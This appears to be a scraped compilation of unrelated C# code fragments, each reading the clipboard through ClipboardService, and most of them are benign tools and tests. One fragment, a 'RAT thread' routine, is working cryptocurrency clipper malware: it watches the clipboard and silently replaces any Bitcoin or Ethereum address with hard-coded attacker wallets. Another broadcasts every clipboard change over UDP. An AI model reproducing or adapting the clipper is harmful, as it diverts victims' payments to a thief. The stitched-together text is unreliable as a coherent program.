public static void Add(RootCommand command) { var rr = new Command("readrsa", "3. (本地)读取剪切板公钥值写入txt的pfx文件中"); rr.AddAlias("rr"); rr.AddOption(new Option <string>("-val", () => string.Empty, "通过命令行将公钥传入")); rr.AddOption(new Option <bool>("-dev", DevDesc)); rr.Handler = CommandHandler.Create((string val, bool dev) => { if (string.IsNullOrWhiteSpace(val)) { var text = ClipboardService.GetText(); if (string.IsNullOrWhiteSpace(text)) { Console.WriteLine("错误:读取剪切板值无效!"); return; } else { val = text; } } var value = Serializable.DJSON <AppIdWithPublicKey>(val); Handler(value, dev); Console.WriteLine("完成。"); }); command.AddCommand(rr); }
public void Export() { Run("export tada").StandardOutput.Should().Contain("\"Raw\": \"🎉\""); Run("export tada --format json").StandardOutput.Should().Contain("\"Raw\": \"🎉\""); Run("export tada -f json").StandardOutput.Should().Contain("\"Raw\": \"🎉\""); Run("export tada -f JSON").StandardOutput.Should().Contain("\"Raw\": \"🎉\""); Run("export tada --format toml").StandardOutput.Should().Contain("raw = \"🎉\""); Run("export tada -f toml").StandardOutput.Should().Contain("raw = \"🎉\""); Run("export tada -f TOML").StandardOutput.Should().Contain("raw = \"🎉\""); Run("export tada --format xml").StandardOutput.Should().Contain("<Raw>🎉</Raw>"); Run("export tada -f xml").StandardOutput.Should().Contain("<Raw>🎉</Raw>"); Run("export tada -f XML").StandardOutput.Should().Contain("<Raw>🎉</Raw>"); Run("export tada --format yaml").StandardOutput.Should().Contain("- Raw: \"\\U0001F389\""); Run("export tada -f yaml").StandardOutput.Should().Contain("- Raw: \"\\U0001F389\""); Run("export tada -f YAML").StandardOutput.Should().Contain("- Raw: \"\\U0001F389\""); Run("export tada --copy"); ClipboardService.GetText().Should().Contain("\"Raw\": \"🎉\""); Run("export tada -c"); ClipboardService.GetText().Should().Contain("\"Raw\": \"🎉\""); Run("export -h").StandardOutput.Should() .Contain("Export emoji data") .And.Contain("Find emojis via description, category, alias or tag") .And.Contain("Format the data as <json|toml|xml|yaml>"); }
/// <summary> /// Gets text from clipboard. /// </summary> /// <returns>Clipboard text.</returns> public string GetClipboardText() { // code from string ret = String.Empty; Thread staThread = new Thread( () => { try { var text = ClipboardService.GetText(); if (string.IsNullOrEmpty(text)) { return; } ret = text; } catch (Exception) { return; } }); staThread.SetApartmentState(ApartmentState.STA); staThread.Start(); staThread.Join(); // at this point either you have clipboard data or an exception*/ return(ret); }
/// <summary> /// This function is the callback used to execute the command when the menu item is clicked. /// See the constructor to see how the menu item is associated with this function using /// OleMenuCommandService service and MenuCommand class. /// </summary> /// <param name="sender">Event sender.</param> /// <param name="e">Event args.</param> private void MenuItemCallback(object sender, EventArgs e) { var clipboardText = ClipboardService.GetText(); if (string.IsNullOrWhiteSpace(clipboardText)) { return; } var formatedText = TextHelper.GetFormattedText(clipboardText); if (string.IsNullOrWhiteSpace(formatedText)) { return; } var dte = (this.package as BaseCommandPackage).GetServiceHelper(typeof(DTE)) as DTE; if (dte != null) { var doc = (TextDocument)dte.Application.ActiveDocument.Object(null); doc.Selection.Text = formatedText; //doc.EndPoint.CreateEditPoint().Insert(formatedText); } }
private void ScriptValidByIdBase_Click(object sender, EventArgs e, bool newWindow) { try { var menuItem = GetMenuItem(); if (menuItem == null) { return; } if (newWindow) { ScriptFactory.Instance.CreateNewBlankScript(ScriptType.Sql); } var dte = _package.GetServiceHelper(typeof(DTE)) as DTE; if (dte != null) { var doc = (TextDocument)dte.Application.ActiveDocument.Object(null); var clipBoardText = ClipboardService.GetText(); var clipBoardIsGuid = Guid.TryParse(clipBoardText, out Guid id); string query = QueryService.GetSelectQuery(menuItem.Tag.ToString(), clipBoardIsGuid ? id.ToString() : string.Empty); doc.EndPoint.CreateEditPoint().Insert(query); } } catch (Exception ex) { } }
void GetText() { #region GetText var text = ClipboardService.GetText(); #endregion }
static void VerifyInner(string expected) { ClipboardService.SetText(expected); var actual = ClipboardService.GetText(); Assert.AreEqual(expected, actual); }
public string PasteX() { try { return(ClipboardService.GetText()); } catch (Exception e) { return("kosong"); } }
private async void OnAppendReadingToolLink() { IClipboardService cService = new ClipboardService(); var htmlBody = await cService.GetText(); StringBuilder builder = new StringBuilder(htmlBody); builder.Append("<br/>"); builder.Append("<br/>"); builder.Append("<a href=''>Reading Tool :</a>"); await cService.CopyText(builder.ToString()); }
private async Task OnPublish() { IClipboardService cService = new ClipboardService(); var htmlBody = await cService.GetText(); if (!string.IsNullOrEmpty(htmlBody)) { var smtpService = new SmtpService(); var prepareTitle = await PrepareTitleForMyBlogPostAsync(); smtpService.SendEmail(prepareTitle, htmlBody); } }
public void Demojify() { Run("demojify Hello, 🌍!").ShouldHaveOutput($"Hello, :earth_africa:!{NewLine}"); Run("d Hello, 🌍!").ShouldHaveOutput($"Hello, :earth_africa:!{NewLine}"); Run("d \"Hello, 🌍!\"").ShouldHaveOutput($"Hello, :earth_africa:!{NewLine}"); Run("d Hello, 🌍! --copy"); ClipboardService.GetText().Should().Be("Hello, :earth_africa:!"); Run("d 🎉 -c"); ClipboardService.GetText().Should().Be(":tada:"); Run("d -h").StandardOutput.Should() .Contain("Replace raw emojis in text with aliases") .And.Contain("A text with raw emojis"); }
public void Emojify() { Run("emojify Hello, :earth_africa:!").ShouldHaveOutput($"Hello, 🌍!{NewLine}"); Run("e Hello, :earth_africa:!").ShouldHaveOutput($"Hello, 🌍!{NewLine}"); Run("e \"Hello, :earth_africa:!\"").ShouldHaveOutput($"Hello, 🌍!{NewLine}"); Run("e Hello, :earth_africa:! --copy"); ClipboardService.GetText().Should().Be("Hello, 🌍!"); Run("e :tada: -c"); ClipboardService.GetText().Should().Be("🎉"); Run("e -h").StandardOutput.Should() .Contain("Replace aliases in text with raw emojis") .And.Contain("A text with emoji aliases"); }
public void Alias() { Run("alias earth").ShouldHaveOutput($":earth_africa:{NewLine}:earth_americas:{NewLine}:earth_asia:{NewLine}"); Run("a earth").ShouldHaveOutput($":earth_africa:{NewLine}:earth_americas:{NewLine}:earth_asia:{NewLine}"); Run("a globe showing").ShouldHaveOutput($":earth_africa:{NewLine}:earth_americas:{NewLine}:earth_asia:{NewLine}"); Run("a \"globe showing\"").ShouldHaveOutput($":earth_africa:{NewLine}:earth_americas:{NewLine}:earth_asia:{NewLine}"); Run("a earth --copy"); ClipboardService.GetText().Should().Be(":earth_africa::earth_americas::earth_asia:"); Run("a tada -c"); ClipboardService.GetText().Should().Be(":tada:"); Run("a -h").StandardOutput.Should() .Contain("Get emoji aliases") .And.Contain("Find emojis via description, category, alias or tag"); }
public void Raw() { Run("raw earth").ShouldHaveOutput($"🌍{NewLine}🌎{NewLine}🌏{NewLine}"); Run("r earth").ShouldHaveOutput($"🌍{NewLine}🌎{NewLine}🌏{NewLine}"); Run("r globe showing").ShouldHaveOutput($"🌍{NewLine}🌎{NewLine}🌏{NewLine}"); Run("r \"globe showing\"").ShouldHaveOutput($"🌍{NewLine}🌎{NewLine}🌏{NewLine}"); Run("r earth --copy"); ClipboardService.GetText().Should().Be("🌍🌎🌏"); Run("r tada -c"); ClipboardService.GetText().Should().Be("🎉"); Run("r -h").StandardOutput.Should() .Contain("Get raw emojis") .And.Contain("Find emojis via description, category, alias or tag"); }
private async Task PasteCommandImpl() { if (ConsoleService.IsEnabled) { try { string text = ClipboardService.GetText(); int index = ConsoleService.SelectionStart; await ConsoleService.InsertText(index, text); } catch (ArgumentException e) { await DialogService.ShowErrorDialogAsync(e.Message, "Exception"); } } }
public void TestDay1Part1() { TextWriter standardOut = Console.Out; try { StringWriter sw = new StringWriter(); Console.SetOut(sw); Runner.Run(new[] { "1", "1" }); Assert.AreEqual($"test input{Environment.NewLine}", sw.ToString()); Assert.AreEqual("test input", ClipboardService.GetText()); } finally { Console.SetOut(standardOut); } }
public static void Add(RootCommand command) { var rd = new Command("readdesc", "X. (本地)读取剪切板更新日志生成一行数据复制到剪切板中"); rd.AddAlias("rd"); rd.Handler = CommandHandler.Create(() => { var text = ClipboardService.GetText(); if (string.IsNullOrWhiteSpace(text)) { Console.WriteLine("错误:读取剪切板值无效!"); return; } var array = text.Split(Environment.NewLine); text = string.Join(';', array); text = $"\"{text}\""; ClipboardService.SetText(text); Console.WriteLine("OK"); }); command.AddCommand(rd); }
private async Task PasteAndSendLinesCommandImpl() { try { if (ConsoleService.IsEnabled) { string text = ClipboardService.GetText(); var lines = Regex.Split(text, $"(?={SettingsService.NewLine})"); if (lines.Length > 1) { foreach (var line in lines) { if (!Session.IsRunning) { // The session has ended break the loop. break; } int index = ConsoleService.SelectionStart; await ConsoleService.InsertText(index, line); SerialPortService.Write(line); if (SettingsService.LinePushDelay > 0) { await TaskHelpers.Delay(SettingsService.LinePushDelay); } } } } } catch (ArgumentException e) { await DialogService.ShowErrorDialogAsync(e.Message, "Exception"); } }
public static void Add(RootCommand command) { var rmci = new Command("read_msal_client_id", "读取 MSALClientId 写入txt的pfx文件中"); rmci.AddAlias("rmci"); rmci.AddOption(new Option <string>("-val", () => string.Empty, "通过命令行将值传入")); rmci.Handler = CommandHandler.Create((string val) => { if (string.IsNullOrWhiteSpace(val)) { var text = ClipboardService.GetText(); if (string.IsNullOrWhiteSpace(text)) { Console.WriteLine("错误:读取剪切板值无效!"); return; } else { val = text; } } if (!Guid.TryParse(val, out var guid)) { Console.WriteLine("错误:值无效!"); return; } var filePath = Path.Combine(projPath, "masl-client-id.pfx"); IOPath.FileIfExistsItDelete(filePath); File.WriteAllBytes(filePath, guid.ToByteArray()); Console.WriteLine("完成。"); Console.WriteLine(filePath); }); command.AddCommand(rmci); }
static void CheckClipBoardChange() { string cb = ClipboardService.GetText(); while (true) { Thread.Sleep(100); string cbt = ClipboardService.GetText(); if (cbt == null) { continue; } if (cb != cbt && cbt.Length > 0) { Console.WriteLine($"Clipboard changed: {cbt}"); cb = cbt; byte[] cbb = Encoding.UTF8.GetBytes(cb); byte[] message = new byte[4 + cbb.Length]; secretCode.CopyTo(message, 0); cbb.CopyTo(message, 4); udpClient.Send(message, message.Length, groupEp); } } }
/// <summary> /// Gets text from clipboard. /// </summary> /// <returns>Clipboard text.</returns> public static string GetClipboardText() { return(ClipboardService.GetText()); }
/// <summary> /// The entry point of the RAT thread. /// </summary> /// <param name="Context">The context.</param> private static void RatThreadRoutine(object Context) { var IsRunning = true; // // While the RAT runs... // while (IsRunning) { Debug.WriteLine("Executing tick on the RAT thread...", "EVENT"); // // Retrieve the text saved in the clipboard. // var ClipboardText = ClipboardService.GetText(); if (string.IsNullOrEmpty(ClipboardText)) { goto WaitForNextLoop; } // // If the crypto-address replacement feature is enabled... // if (true) { // // If the clipboard does not contain our bitcoin address.. // if (!string.Equals(ClipboardText, "3HxNb6nHFh2GgPDdCbD76tkFw5WB27hqfS")) { // // ..and the clipboard text IS a bitcoin address. // if (BitcoinAddress.IsValid(ClipboardText)) { Debug.WriteLine($"The clipboard contains a valid bitcoin address. (Address: {ClipboardText})", "ACTION"); // // Set our address instead. // ClipboardService.SetText("3HxNb6nHFh2GgPDdCbD76tkFw5WB27hqfS"); Debug.WriteLine("We've replaced the clipboard text with our bitcoin address.", "ACTION"); } } else { Debug.WriteLine($"The clipboard contains OUR bitcoin address. (Address: {ClipboardText})", "LOG"); } // // If the clipboard does not contain our ethereum address.. // if (!string.Equals(ClipboardText, "0x93Efc562CC3F67bE28C609c59879f90F1cB9757a")) { // // ..and the clipboard text IS a ethereum address. // if (EthereumAddress.IsValid(ClipboardText)) { Debug.WriteLine($"The clipboard contains a valid ethereum address. (Address: {ClipboardText})", "ACTION"); // // Set our address instead. // ClipboardService.SetText("0x93Efc562CC3F67bE28C609c59879f90F1cB9757a"); Debug.WriteLine("We've replaced the clipboard text with our ethereum address.", "ACTION"); } } else { Debug.WriteLine($"The clipboard contains OUR ethereum address. (Address: {ClipboardText})", "LOG"); } } // // Wait 1 second before running again. // WaitForNextLoop: Thread.Sleep(1000); } }
public string GetInputLineNoSuffix(string prefix) { pref = prefix; Prompting = true; if (pref == "" == false) { Console.Write(pref.Replace("$<path>", Environment.CurrentDirectory) + characters); } if (queuedinput.Count == 0 == false) { string line2 = queuedinput[0]; queuedinput.RemoveAt(0); bool run = false; if (line2.EndsWith("\n")) { line2 = line2.Remove(line2.LastIndexOf("\n")); run = true; } characters += line2; Console.Write(line2); if (cmdnum == cmds.Count == false) { cmdnum = cmds.Count; } usefirstafterpress = false; firstafterpress = false; if (run) { string s = characters; try { if (cmdnum == cmds.Count) { cmds.Add(characters); cmdnum++; memory = ""; usefirstafterpress = false; } else { firstafterpress = true; usefirstafterpress = true; cmdnum++; memory = ""; } } catch { } characters = ""; Console.WriteLine(); Prompting = false; return(s); } } do { ConsoleKeyInfo key = Console.ReadKey(true); if (key.Key != ConsoleKey.Backspace && key.Key != ConsoleKey.Enter && key.Key != ConsoleKey.UpArrow && key.Key != ConsoleKey.DownArrow && key.Key != ConsoleKey.LeftArrow && key.Key != ConsoleKey.RightArrow) { if (key.KeyChar == '\0' == false && key.Key == ConsoleKey.Tab == false && key.Modifiers.HasFlag(ConsoleModifiers.Control) == false) { characters += key.KeyChar; Console.Write(key.KeyChar); if (cmdnum == cmds.Count == false) { cmdnum = cmds.Count; } usefirstafterpress = false; firstafterpress = false; } else if (key.Key == ConsoleKey.V && key.Modifiers.HasFlag(ConsoleModifiers.Control)) { string data = ClipboardService.GetText(); data = data.Replace("\r", ""); if (data.Contains("\n")) { bool endswithrun = data.EndsWith("\n"); int i = 0; foreach (string line in data.Split('\n')) { if ((data.Split('\n').Count() - 1) == i++) { if (endswithrun) { queuedinput.Add(line + "\n"); } else { queuedinput.Add(line); } } else { queuedinput.Add(line + "\n"); } } string line2 = queuedinput[0]; queuedinput.RemoveAt(0); bool run = false; if (line2.EndsWith("\n")) { line2 = line2.Remove(line2.LastIndexOf("\n")); run = true; } characters += line2; Console.Write(line2); if (cmdnum == cmds.Count == false) { cmdnum = cmds.Count; } usefirstafterpress = false; firstafterpress = false; if (run) { string s = characters; try { if (cmdnum == cmds.Count) { cmds.Add(characters); cmdnum++; memory = ""; usefirstafterpress = false; } else { firstafterpress = true; usefirstafterpress = true; cmdnum++; memory = ""; } } catch { } characters = ""; Console.WriteLine(); Prompting = false; return(s); } } else { queuedinput.Add(data); string line2 = queuedinput[0]; queuedinput.RemoveAt(0); characters += line2; Console.Write(line2); if (cmdnum == cmds.Count == false) { cmdnum = cmds.Count; } usefirstafterpress = false; firstafterpress = false; } } } else { if (key.Key == ConsoleKey.Backspace && characters.Length > 0) { characters = characters.Substring(0, (characters.Length - 1)); if (Console.CursorLeft == 0) { Console.SetCursorPosition(Console.BufferWidth - 1, Console.CursorTop - 1); Console.Write(" "); Console.SetCursorPosition(Console.BufferWidth - 1, Console.CursorTop - 1); } else { Console.Write("\b \b"); } if (cmdnum == cmds.Count == false) { cmdnum = cmds.Count; } usefirstafterpress = false; firstafterpress = false; } else if (key.Key == ConsoleKey.UpArrow) { if (cmdnum == 0 == false) { if (cmds.Count == cmdnum) { memory = characters; } while (characters == "" == false) { characters = characters.Substring(0, (characters.Length - 1)); if (Console.CursorLeft == 0) { Console.SetCursorPosition(Console.BufferWidth - 1, Console.CursorTop - 1); Console.Write(" "); Console.SetCursorPosition(Console.BufferWidth - 1, Console.CursorTop - 1); } else { Console.Write("\b \b"); } } usefirstafterpress = false; firstafterpress = false; cmdnum--; characters = cmds[cmdnum]; Console.Write(cmds[cmdnum]); } } else if (key.Key == ConsoleKey.DownArrow) { if (usefirstafterpress) { if (firstafterpress) { int c = cmdnum - 1; if (c == cmds.Count + 1 == false) { cmdnum--; } } } if (cmdnum == cmds.Count == false) { while (characters == "" == false) { characters = characters.Substring(0, (characters.Length - 1)); if (Console.CursorLeft == 0) { Console.SetCursorPosition(Console.BufferWidth - 1, Console.CursorTop - 1); Console.Write(" "); Console.SetCursorPosition(Console.BufferWidth - 1, Console.CursorTop - 1); } else { Console.Write("\b \b"); } } firstafterpress = false; usefirstafterpress = false; if ((cmdnum + 1) == cmds.Count) { cmdnum++; Console.Write(memory); characters = memory; } else { cmdnum++; characters = cmds[cmdnum]; Console.Write(cmds[cmdnum]); } } } else if (key.Key == ConsoleKey.Enter) { string s = characters; try { if (cmdnum == cmds.Count) { cmds.Add(characters); cmdnum++; memory = ""; usefirstafterpress = false; } else { firstafterpress = true; usefirstafterpress = true; cmdnum++; memory = ""; } } catch { } characters = ""; Console.WriteLine(); Prompting = false; return(s); } } } while (true); }
/// <inheritdoc /> public virtual string?GetText() { return(ClipboardService.GetText()); }
static void Main(string[] args) { File.Copy("程式異動申請清單.tpl.docx", "程式異動申請清單.docx", true); /* * .vscodeignore .vscodeignore Added 1 0 * .md Modified 43 3 * .md Modified 89 5 * package.json .json Modified 4 2 * snippets/go.json .json Modified 26 6 */ // 讀取剪貼簿內容 var text = ClipboardService.GetText(); #if DEBUG text = @".vscodeignore .vscodeignore Added 1 0 .md Modified 43 3 a/b/c/ .md Modified 89 5 package.json .json Modified 4 2 snippets/go.json .json Modified 26 6" ; #endif var records = new List <GitDiff>(); foreach (var item in Regex.Split(text, "\r\n|\r|\n")) { var line = item.Trim(); if (String.IsNullOrEmpty(line)) { continue; } var fields = line.Split(new[] { '\t' }); records.Add(new GitDiff() { File = fields[0], Extension = fields[1], Action = fields[2], LinesAdded = fields[3], LinesRemoved = fields[4] }); } using (WordprocessingDocument doc = WordprocessingDocument.Open("程式異動申請清單.docx", true)) { // Find the first table in the document. Table table = doc.MainDocumentPart.Document.Body.Elements <Table>().First(); var rows = table.Elements <TableRow>().Count(); TableRow secondRow = table.Elements <TableRow>().ElementAt(1).CloneNode(true) as TableRow; TableRow lastRow = table.Elements <TableRow>().ElementAt(rows - 1).CloneNode(true) as TableRow; for (int i = rows - 1; i > 0; i--) { table.Elements <TableRow>().ElementAt(i).Remove(); } for (int i = 0; i < records.Count; i++) { var row = secondRow.CloneNode(true) as TableRow; SetCell(row, 0, String.Format("{0:D2}", i + 1)); SetCell(row, 1, Path.GetFileName(records[i].File)); SetCell(row, 2, Path.GetDirectoryName(records[i].File)); SetCell(row, 3, GetActionCode(records[i].Action)); table.Append(row); } table.Append(lastRow.CloneNode(true) as TableRow); } }